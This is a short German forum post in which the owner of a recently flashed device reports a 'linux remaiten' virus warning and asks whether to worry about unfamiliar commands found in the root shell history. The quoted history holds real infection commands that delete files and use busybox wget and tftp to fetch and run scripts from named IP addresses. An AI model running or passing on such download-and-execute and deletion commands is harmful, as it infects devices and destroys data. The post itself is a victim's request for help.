Beim ftp aufs PC erhielt ich eine Viruswarnung :"linux remaiten virus" für "mscfg "und "retrieve files" ?
Kürzlich geflasht aber die Box benimmt sich manchmal ungewohnt.
nach "cat /home/root/.ash_history"
kriege ich unter anderem folgende IPs ,die ich nicht kenne:
cd /tmp cd /var/run cd /dev/shm cd /mnt cd /var;rm -f *;busybox wget http://107.182.24.29/rv.sh;sh rv.sh;busybox tftp -r rv1.sh -g 208.67.1.114;sh rv1.sh;busybox tftp 107.182.24.29 -c get rv2.sh;sh rv2.sh;exit
busybox wget http://51.254.221.164/mig;cat mig > sh;./sh;rm -f *
Soll ich mir Sorgen machen ?
Habe alle Passwörter geændert.